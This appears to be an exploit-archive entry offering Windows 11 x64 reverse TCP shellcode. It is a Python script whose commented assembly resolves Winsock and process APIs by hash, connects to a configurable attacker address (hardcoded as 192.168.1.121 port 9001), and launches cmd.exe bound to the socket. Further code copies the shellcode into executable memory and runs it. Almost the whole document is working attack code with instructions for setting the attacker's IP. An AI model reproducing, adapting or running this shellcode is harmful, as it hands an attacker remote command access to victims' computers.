Windows 11 x64 - Reverse TCP Shellcode (564 bytes)



EKU-ID: 56158 CVE: OSVDB-ID:
Author: Victor Huerlimann Published: 2025-05-21 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
# 
# Description: Windows 11 x64 Reverse TCP Shell
# Architecture: x64
# OS: Microsoft Windows
# Author: hvictor (Victor Huerlimann)
# Shellcode Size: 564 bytes
# Repository:https://github.com/hvictor/shellcode-x64
#
# Special thanks to wetw0rk (Milton Valencia), from whom I drew inspiration for the indicated parts of the code: https://github.com/wetw0rk/Sickle
#
# Note: You will have to modify the line 193 of this file according to the attacker's IP and port:
# mov r9, 0x7901A8C029230002          # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2]
# The high DWORD is the IPv4 address in little-endian, followed by the 2-bytes port in little-endian, and the 2-bytes address family.

import ctypes, struct
from ctypes import wintypes

from keystone import *
CODE = (
'''
start:
    mov rbp, rsp
    sub rsp, 1600

resolve_kernel32:
    mov dl, 0x4b                        # dl = 'K'
    mov rcx, 0x60                       #
    mov r8, gs:[rcx]                    # R8 = address of PEB
    mov rdi, [r8 + 0x18]                # RDI = address of _PEB_LDR_DATA
    mov rdi, [rdi + 0x30]               # RDI = address of InInitializationOrderModuleList (first _LIST_ENTRY)
search:
    xor rcx, rcx
    mov rbx, [rdi + 0x10]               # RBX = DllBase
    mov rsi, [rdi + 0x40]               # RSI = address of UNICODE string BaseDllName.Buffer
    mov rdi, [rdi]                      # RDI = address of the next _LIST_ENTRY
    cmp [rsi + 0x18], cx                # Compare the 24-th UNICODE char with NULL
    jne search                          # If length of BaseDllName is not 12 UNICODE chars, continue searching
    cmp [rsi], dl                       # Compare the first UNICODE char with 'K'
    jne search                          # If the first UNICODE char is not 'K', continue searching

find_function_jmp:
    jmp callback                        # Jump to callback to make a negative (null byte free) call to get_find_function_addr

get_find_function_addr:                         
    pop rsi                             # The address of find_function is popped in RSI
    mov [rbp + 0x8], rsi                # The address of find_function is stored at (RBP + 8)
    jmp resolve_k32_sym                 # Once the address of find_function has been stored, proceed with the resolution of kernel32 symbols

callback:
    call get_find_function_addr         # When this call is done, the address of the 1st instruction find_function (add rsp, 8) is pushed to the stack
                                        # This is the address of find_function, and it will be popped in ESI (see get_find_function_addr).
                
find_function:         

# Current Stack Layout:
#---------------------------------------------------------------------------
# QWORD: Return Address (addr of instruction after "call find_function", see below)
# QWORD: Number of hash bytes + 8           <- RSP
# QWORD: <0x00000000> <Hash of CreateProcessA (4 bytes)>
# QWORD: <0x00000000> <Hash of LoadLibraryA (4 bytes)>
# ...
# QWORD: 0x0000000000000000
#---------------------------------------------------------------------------

    add rsp, 8                          # Point RSP to (Number of hash bytes + 8)
    pop rax                             # RAX = Number of hash bytes + 8
    push -1                             # Write -1 on the stack instead of (Number of hash bytes + 8)
    add rsp, rax                        # Add (Number of hash bytes + 8) to RSP: it now points to 0x0000000000000000

# Current Stack Layout:
#---------------------------------------------------------------------------
# QWORD: Return Address
# QWORD: 0xffffffffffffffff
# QWORD: <0x00000000> <Hash of CreateProcessA (4 bytes)>
# QWORD: <0x00000000> <Hash of LoadLibraryA (4 bytes)>
# ...
# QWORD: 0x0000000000000000                <- RSP
#---------------------------------------------------------------------------

find_function_loop2:
    xor rax, rax
    xor rdi, rdi
    mov eax, [rbx + 0x3c]               # EAX = offset to the PE Header of the module = e_lfanew
    mov edi, [rbx + rax + 0x88]         # EDI = RVA of the Export Directory Table of the module (1st field: VirtualAddress)
    add rdi, rbx                        # RDI = VMA of the Export Directory Table of the module
    mov ecx, [rdi + 24]                 # ECX = NumberOfNames (field of the Export Directory Table of the module)
    mov eax, [rdi + 32]                 # EAX = RVA of AddressOfNames (array of Name Addresses, field of the Export Directory Table)
    add rax, rbx                        # EAX = VMA of AddressOfNames
    mov [rbp - 8], rax                  # Save the VMA of AddressOfNames at (EBP - 8): this location is never touched for anything else

find_function_loop:
    dec ecx                             # Initially, ECX = NumberOfNames: decrement to get the index of the last name
    mov rax, [rbp - 8]                  # EAX = VMA of AddressOfNames
    mov esi, [rax + rcx * 4]            # ESI = RVA of the current Symbol Name
    add rsi, rbx                        # RSI = VMA of the current Symbol Name

compute_hash:
    xor rax, rax                        # EAX = 0
    cdq                                 # If the MSB of EAX = 1: EDX = 0x11111111
                                        # If the MSB of EAX = 0: EDX = 0x00000000 -> fills EDX with the sign of EAX
                                        # In this case, EDX = 0x00000000 because EAX = 0x00000000

compute_hash_repeat:
    ror edx, 0xd                        # Right-shift EDX of 13 bits
    add edx, eax                        # EDX += current EAX value
    lodsb                               # Load the byte pointed by ESI into AL
    test al, al                         # Test if the NULL terminator of the Symbol Name has been reached
    jnz compute_hash_repeat             # If the NULL terminator has been reached (ZF = 1), proceed to hash comparison
                                        # Else, perform the next iteration of the hash-computation algorithm
                                        # At this point, EDX contains the computed hash of the current symbol

find_function_compare:                          
    cmp edx, [rsp - 8]                  # Compare the computed hash with the hash of the wanted symbol
    jnz find_function_loop              # If ZF = 0, the hash is different: proceed with the next name from AddressOfNames
                                        # If ZF = 1, the hash is equal: symbol found: continue hereby
    mov edx, [rdi + 36]                 # EDX = RVA of the AddressOfNameOrdinals array
    add rdx, rbx                        # RDX = VMA of the AddressOfNameOrdinals array
    mov cx, [rdx + 2 * rcx]             # CX = Symbol's Ordinal (lower 16 bits of ECX)
    mov edx, [rdi + 28]                 # EDX = RVA of the AddressOfFunctions array
    add rdx, rbx                        # RDX = VMA of the AddressOfFunctions array
    mov eax, [rdx + 4 * rcx]            # EAX = AddressOfFunctions[ordinal] = RVA of the wanted symbol
    add rax, rbx                        # EAX = VMA of the wanted symbol
    push rax                            # Push the wanted symbol's VMA onto the stack:
                                        # ATTENTION: The symbol's VMA overwrites its Hash on the stack!
    mov rax, [rsp - 8]
    cmp rax, -1                         # If *(RSP - 8) is -1: ZF = 1: all wanted symbols have been resolved
    jnz find_function_loop2             # Until all wanted symbols have been resolved, continue looping

find_function_finish:                   # When we get here, all wanted symbols have been resolved: their VMAs are on the stack
    sub rsp, 16                         # Point RSP to the Return Address of find_function
    ret                                 # Return

resolve_k32_sym:
    mov rax, 0x00000000ec0e4e8e         # Hash of LoadLibraryA
    push rax
    mov rax, 0x0000000016b3fe72         # Hash of CreateProcessA
    push rax
    mov rax, 0x0000000078b5b983         # Hash of TerminateProcess
    push rax
    mov rax, 32                         # Push 32 onto the stack
    push rax
    call [rbp + 8]                      # Call to find_function (see find_function above)

load_ws2_32:
    mov rax, 0x0000000000006C6C         # 'll x00 x00 x00 x00 x00 x00' (reversed)
    push rax
    mov rax, 0x642E32335F327377         # 'ws2_32.d' (reversed)
    push rax
    mov rcx, rsp                        # Paramter 1 = address of "ws2_32.dll"
    sub rsp, 40                         # Create 40 bytes of room on the stack
    call [rsp + 80]                     # Call LoadLibraryA    
    nop

resolve_ws2_sym:
    mov rbx, rax                        # RBX = Base Address of ws2_32.dll
    mov rax, 0x0000000060aaf9ec         # Hash of connect
    push rax
    mov rax, 0x00000000adf509d9         # Hash of WSASocketA
    push rax
    mov rax, 0x000000003bfcedcb         # Hash of WSAStartup
    push rax
    mov rax, 32
    push rax                            # Push 32 (Number of Hashes pushed + 8)
    call [rbp + 8]                      # Call find_function

    sub rsp, 512

call_WSAStartup:
    mov rcx, 0x202                      # RCX = WinSock Version 2.2
    lea rdx, [rsp + 800]                # RDX = Address of output WSAData structure
    call [rsp + 520]                    # Call WSAStartup

call_WSASocketA:
    mov rcx, 2                          # Parameter af = 2 (AF_INET)
    mov rdx, 1                          # Parameter type = 1
    mov r8, 6                           # Parameter protocol = 6 (TCP)
    xor r9, r9                          # Parameter lpProtocolInfo = 0
    mov [rsp + 32], r9                  # Parameter dwFlags = 0
    mov [rsp + 40], r9                  # Parameter g = 0
    call [rsp + 528]                    # Call WSASocketA


call_connect:
    mov rsi, rax                        # Save socket fd in RSI
    mov rcx, rax                        # RCX = Parameter s = socket fd created with WSSocketA
    mov r8, 16                          # R8 = Parameter namelen = 16

    # Preparation of the sockaddr_in structure on the stack:
    # struct sockaddr_in {
    #   QWORD: [sin_addr (4 bytes) | sin_port (2 bytes) | sin_family (2 bytes)]
    #   QWORD: sin_zero = [00000000 00000000]
    # }
    mov r9, 0x7901A8C029230002          # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2]
    lea rdx, [rsp + 800]                # RDX = Parameter name = Address of struct sockaddr_in
    mov [rdx], r9                       # Write fields: sin_addr, sin_port, sin_family
    xor r9, r9
    mov [rdx + 8], r9                   # Write field sin_zero
    call [rsp + 536]                    # Call connect

# Thanks to wetw0rk (Milton Valencia) for his setup_STARTUPINFOA implementation:
# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py
create_STARTUPINFOA:
    lea rdi, [rsp + 800]
    add rdi, 0x300
    mov rbx, rdi
    xor eax, eax
    mov ecx, 0x20
    rep stosd                           # Zero-out 0x80 bytes
    mov eax, 0x68                       # EAX = sizeof(_STARTUPINFO) = 0x68
    mov [rbx], eax                      # Field lpStartInfo.cb = sizeof(_STARTUPINFO)
    mov eax, 0x100                      # EAX = STARTF_USESTDHANDLES
    mov [rbx + 0x3c], eax               # Field lpStartupInfo.dwFlags = STARTF_USESTDHANDLES
    mov [rbx + 0x50], rsi               # Field lpStartupInfo.hStdInput = socket fd
    mov [rbx + 0x58], rsi               # Field lpStartupInfo.hStdOutput = socket fd
    mov [rbx + 0x60], rsi               # Field lpStartupInfo.hStdError = socket fd    

# Thanks to wetw0rk (Milton Valencia) for his call_CreateProcessA implementation:
# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py    
call_CreateProccessA:
    xor rax, rax
    xor rcx, rcx                        # Parameter lpApplicationName = 0
    lea rdx, [rsp + 800]                # Parameter lpCommandLine
    add rdx, 0x180
    mov eax, 0x646d63                   # EAX = "cmd"
    mov [rdx], rax                      # Write "cmd" in the lpCommandLine parameter
    xor r8, r8                          # Parameter lpProcessAttributes = 0
    xor r9, r9                          # Parameter lpThreadAttributes = 0
    xor rax, rax
    inc eax
    mov [rsp + 0x20], rax               # Parameter bInheritHandles = 1
    dec eax
    mov [rsp + 0x28], rax               # Parameter dwCreationFlags = 0
    mov [rsp + 0x30], rax               # Parameter lpEnvironment = 0
    mov [rsp + 0x38], rax               # Parameter lpCurrentDirectory = 0
    mov [rsp + 0x40], rbx               # Parameter lpStartupInfo = address of _STARTUPINFO
    add rbx, 0x68
    mov [rsp + 0x48], rbx               # Parameter lpProcessInformation = output address, right after _STARTUPINFO
    call [rsp + 616]

call_TerminateProcess:
    xor rcx, rcx
    dec rcx                             # Parameter hProcess = -1 = this process
    xor rdx, rdx                        # Parameter uExitCode = 0 (graceful termination)
    int3
    call [rsp + 608]                    # Call TerminateProcess
'''
)


# Initialize engine in 64-bit mode
ks = Ks(KS_ARCH_X86, KS_MODE_64)
encoding, count = ks.asm(CODE)
instructions = ""
for dec in encoding: 
 instructions += "\\x{0:02x}".format(int(dec)).rstrip("\n")
 
print("Opcodes = (\"" + instructions + "\")")
print(f"Size: {len(encoding)} bytes.")

# E

# Preparation of WSAStartup (not included in the shellcode)
# Define necessary structures and constants
class WSADATA(ctypes.Structure):
    _fields_ = [
        ("wVersion", wintypes.WORD),
        ("wHighVersion", wintypes.WORD),
        ("szDescription", wintypes.CHAR * 257),
        ("szSystemStatus", wintypes.CHAR * 129),
        ("iMaxSockets", wintypes.UINT),
        ("iMaxUdpDg", wintypes.UINT),
        ("lpVendorInfo", ctypes.POINTER(ctypes.c_char))
    ]

# Load the Winsock library
ws2_32 = ctypes.windll.ws2_32

# Define the WSAStartup function prototype
# WSAStartup takes two arguments:
# 1. A WORD containing the version of Winsock requested (e.g., 0x0202 for Winsock 2.2)
# 2. A pointer to a WSADATA structure that receives the details of the Winsock implementation
ws2_32.WSAStartup.argtypes = [wintypes.WORD, ctypes.POINTER(WSADATA)]
ws2_32.WSAStartup.restype = wintypes.INT

def call_wsastartup():
    # Request version 2.2 (0x0202)
    version_requested = 0x0202

    # Create an instance of WSADATA to hold the output
    wsadata = WSADATA()

    # Call WSAStartup
    result = ws2_32.WSAStartup(version_requested, ctypes.byref(wsadata))
    
    if result != 0:
        raise RuntimeError(f"WSAStartup failed with error code {result}")

    print(f"WSAStartup succeeded. Winsock version: {wsadata.wVersion >> 8}.{wsadata.wVersion & 0xFF}")
    return wsadata

call_wsastartup()

sh = b""
for e in encoding:
    sh += struct.pack("B", e)
shellcode = bytearray(sh)

# Alloco memoria eseguibile per lo shellcode
ptr = ctypes.windll.kernel32.VirtualAlloc(0x10000000,
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

# Metto lo shellcode nel buffer `buf`
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

# Copio lo shellcode nella memoria allocata
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))

print("Shellcode: Short Reverse Shell")
print("Shellcode address = %s" % hex(ptr))
input("\n[?] Press Enter to execute the shellcode: ")

# Eseguo lo shellcode in un nuovo thread, su cui faccio la join
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))

ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))